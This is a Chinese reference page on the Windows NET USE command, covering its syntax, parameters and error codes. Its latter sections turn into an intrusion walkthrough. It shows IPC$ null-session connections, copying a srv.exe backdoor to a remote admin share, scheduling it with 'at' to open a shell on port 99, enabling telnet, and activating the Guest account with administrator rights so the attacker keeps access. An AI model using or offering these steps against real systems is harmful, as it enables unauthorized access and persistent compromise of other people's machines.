WinCMD NET USE 命令
功能描述:用於將計算機與共享的資源相連接(建立磁盤映射),或者切斷計算機與共享資源的連接(刪除磁盤映射),當不帶選項使用本命令時,它會列出計算機的連接。
1、命令語法:
NET USE
[devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[/USER:[dotted domain name\]username]
[/USER:[username@dotted domain name]
[/SMARTCARD]
[/SAVECRED]
[/REQUIREINTEGRITY]
[/REQUIREPRIVACY]
[/WRITETHROUGH]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE {devicename | *} [password | *] /HOME
NET USE [/PERSISTENT:{YES | NO}]
2、參數說明
- devicename //指定一個名字以便與資源相連接,或者指定要切斷的設備。\\computername //指控制共享資源的計算機的名字。如果計算機名中包含有空字符,就要將雙反斜線 (\\) 和計算機名一起用引號(" ")括起來。計算機名可以有1 到 15 個 字符。
- 有兩種類型的設備名:磁盤驅動器 (D: 至 Z:) 和打印機
- (LPT1: 至 LPT3:)。輸入 一個星號來代替一個指定的設備名可以分配下一個可用設備名。
- \sharename //指共享資源的網絡名字。
- \volume //指定一個服務器上的 NetWare 卷。用戶必須安裝 Netware的客戶服務(Windows 工作站) 或者 Netware 的網關服務(Windows 服務器) 並使之與 NetWare 服務器相連。
- password //指訪問共享資源所需要的密碼。* 進行密碼提示。當在密碼提示符下輸入密碼時,密碼不會顯示。
- /USER //指定連接時的一個不同的用戶名。
- domainname //指定另外一個域。如果缺省域,就會使用當前登錄的域。
- username //指定登錄的用戶名。
- /SMARTCARD //指定連接使用在智能卡上的憑據。
- /SAVECRED //指定保留用戶名和密碼。此開關被忽略,除非命令提示輸入用戶名和密碼。
- /HOME //將用戶與他們的主目錄相連。
- /DELETE //取消一個網絡連接,並且從永久連接列表中刪除該連接。
- /PERSISTENT //控制對永久網絡連接的使用。其默認值是最近使用的設置。
- YES //在連接產生時保存它們,並在下次登錄時恢復它們。
- NO //不保存正在產生的連接或后續的連接;現有的連接將在下次登錄時恢復。可以使用 /DELETE 選項開關來刪除永久連接。
列如:
net use J: \\MOVIE01\movie06$ //建立磁盤映射
net use i: \\movie\movie3$ "2009" /user:"2009" //用用戶名登陸磁盤映射
net use i: /del //刪除磁盤映射↓
3、錯誤列表:
- System Errors //系統錯誤種類
- System error 5 - Access is denied //系統錯誤5 -拒絕訪問
- System error 5 because of firewall //系統錯誤五,因為防火牆
- System error 5 when using net view command in Vista //系統錯誤5 在Vista使用net view
- System error 8 - Not enough storage is available to process this command //系統錯誤8 -沒有足夠的存儲是可用來處理此命令
- System error 21 has occurred - The device is not ready. //系統錯誤21日發生了-該裝置沒有准備好。
- System error 51 has occurred - The remote computer is not available //系統錯誤51已經發生-遠程計算機不可到達
- System error 52 - You were not connected because a duplicate name exists on the network. //系統錯誤52 -本機在網絡中重名。
- System error 53 - The network path was not found //系統錯誤53 -網絡路徑沒有被發現
- System error 59 has occurred. //系統錯誤59已經發生。 An unexpected network error occurred 意想不到的網絡發生錯誤
- System error 64 - "The specified network name is no longer available" //系統錯誤64 -"指定網絡名稱不再可用"
- System error 67 - The network name cannot be found //系統錯誤67 -網絡名稱不能找到
- System Error 71 - The network request was not accepted //系統錯誤71 -網絡的要求不被接受
- system error 71 has occurred - Post //系統錯誤71已經發生-送出
- System error 85 has occurred. The local device name is already in use //系統錯誤85已經發生。本地設備名是已在使用中
- System error 85 has occurred - Case Study //系統錯誤85已經發生-案例研究
- System error 234 - More data is available
- System Error 1130 - "Not enough server storage is available to process this command" and “Not enough memory to complete transaction. Close some applications and retry" //系統錯誤1130 -"沒有足夠的服務器存儲,是可用來處理此命令" " 沒有足夠的內存,以完成處理。 關閉一些應用程序和再審"
- System error 1219 has occurred - The credentials supplied conflict with an existing set of credentials //系統錯誤1219已經發生 - 全權證書供應的沖突與現有的全權證書
- System error 1219 - Multiple connections to a server //系統錯誤1219 - 多重連接到一台服務器
- System error 1231 has occurred. The network location cannot be reached. //系統錯誤1231已經發生 - 網絡定位不能達成共識。
- System error 1231 - There are no entries on the list //系統錯誤123已經發生 - 沒有任何entries名單
- System Error 1240 - The account is not authorized to login from this station. //系統錯誤1240 - 該帳戶是沒有獲得授權登錄從這個站點。
- System error 1311 - There are currently no logon servers available to service the logon request //系統錯誤1311 - 沒有登入伺服器提供服務登錄請求
- System error 1312 has occurred - - A specified logon session does not exist. It may already have been terminated. //系統錯誤, 1312已經發生 - - 指定帳號會議是不存在的。 它可能已經被終止。
- System Error 1314 – A required privilege is not held by the client //系統錯誤第1314 - 要求特權,是不是舉行,由客戶端
- System error 1326 has occurred - Logon failure: unknown user name or bad password //系統錯誤, 1326已經發生 -登錄失敗:未知的用戶名或密碼
- System error 1326 - Logon failure: unknown user name //系統錯誤1326 -登錄失敗:未知的用戶名
- System error 1326 has occurred when using net use in Vista //系統錯誤1326發生-Vista系統中在使用網絡應用
- System error 1331 has occurred - Logon failure: account current disable //系統錯誤第1331發生了-登入失敗:帳戶停用
- System error 1385 has occurred - Logon failure: the user has not been granted the requested logon type at this computer //系統錯誤第1385發生了-登入失敗:使用者未獲批准,被請求登入類型,在這台電腦
- System error 1396 has occurred - Logon Failure: The target account name is incorrect. //系統錯誤, 1396已經發生 -登入失敗:目標帳戶名稱是不正確。
- System error 6118 - The list of servers for this workgroup is not currently available //系統錯誤6118 -名單上的服務器,這個工作還沒有可供
- System error 1726 has occurred. The remote procedure call failed. //系統錯誤, 1726已經發生。 遠程過程調用失敗了。
4、其他示例:
- net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格) //建立空連接:
- net use \\IP\ipc$ "密碼" /user:"用戶名" (同樣有3個空格) //建立非空連接:
- net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推) //映射默認共享 //如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
- net use \\IP\ipc$ /del //刪除一個ipc$連接 :
- net use c: /del //刪除映射的c盤,其他盤類推
- net use * /del //刪除全部,會有提示要求按y確認
- net view \\IP //查看遠程主機的共享資源(但看不到默認共享)
- net share //查看本地主機的共享資源(可以看到本地的默認共享)
- nbtstat -A IP //得到遠程主機的用戶名列表
- net user //得到本地主機的用戶列表
- net time \\IP //查看遠程主機的當前時間
- net start //顯示本地主機當前服務
- net start 服務名 /y //啟動本地服務
- net stop 服務名 /y //關閉本地服務
- net use z: \\IP\baby //映射遠程共享,此命令將共享名為baby的共享資源映射到z盤
- net use c: /del //刪除映射的c盤,其他盤類推
- net use * /del /y //刪除全部 刪除共享映射 (本人測試,使用該命令后,在無任何操作的情況下 20秒 左右才能生效,原因未知 -- 2020.09.07)
1、向遠程主機復制文件
copy \路徑\srv.exe \\IP\共享目錄名,如:
copy ccbirds.exe \\*.*.*.*\c 即將當前目錄下的文件復制到對方c盤內
2、遠程添加計划任務
at \\ip 時間 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:時間盡量使用24小時制;在系統默認搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑
3、開啟遠程主機的telnet
這里要用到一個小程序:opentelnet.exe,各大下載站點都有,而且還需要滿足四個要求:
- 1)目標開啟了ipc$共享
- 2)你要擁有管理員密碼和帳號
- 3)目標開啟RemoteRegistry服務,用戶就該ntlm認證
- 4)對WIN2K/XP有效,NT未經測試
命令格式:OpenTelnet.exe \\server account psw NTLM認證方式 port
試例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
4、 激活用戶/加入管理員組
net uesr account /active:yes
net localgroup administrators account /add
5、 關閉遠程主機的telnet
同樣需要一個小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
試例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""
6、 刪除一個已建立的ipc$連接
net use \\IP\ipc$ /del
5、經典 net use 入侵:
- 1、C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
- 這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,后面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
- 復制之前務必用net view \\IP這個命令看一下對方的共享情況
- 2、C:\>copy srv.exe \\127.0.0.1\admin$
- 先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什么地方去了)。
- 3、 C:\>net time \\127.0.0.1
- 查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
- 4、C:\>at \\127.0.0.1 11:05 srv.exe
- 用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎么啟動啊,呵呵!)
- 5、C:\>net time \\127.0.0.1
- 再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
- 6、C:\>telnet 127.0.0.1 99
- 這里會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。
- 雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
- 7、C:\>copy ntlm.exe \\127.0.0.1\admin$
- 用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
- 8、C:\WINNT\system32>ntlm
- 輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然后使用"net start telnet"來開啟Telnet服務!
- 9、Telnet 127.0.0.1,接着輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈)
- 為了以防萬一,我們再把guest激活加到管理組
- 10、C:\>net user guest /active:yes
- 將對方的Guest用戶激活
- 11、C:\>net user guest 1234
- 將Guest的密碼改為1234,或者你要設定的密碼
- 12、C:\>net localgroup administrators guest /add
- 將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)
根據返回的錯誤號分析原因:
- 錯誤號5,拒絕訪問:很可能你使用的用戶不是管理員權限的,先提升權限;
- 錯誤號51,Windows無法找到網絡路徑:網絡有問題;
- 錯誤號53,找不到網絡路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(端口過濾);
- 錯誤號67,找不到網絡名:你的lanmanworkstation服務未啟動或者目標刪除了ipc$;
- 錯誤號1219,提供的憑據與已存在的憑據集沖突:你已經和對方建立了一個ipc$,請刪除再連;
- 錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了;
- 錯誤號1792,試圖登錄,但是網絡登錄服務沒有啟動:目標NetLogon服務未啟動;
- 錯誤號2242,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼
創建時間:2020.08.27 更新時間:2020.09.07
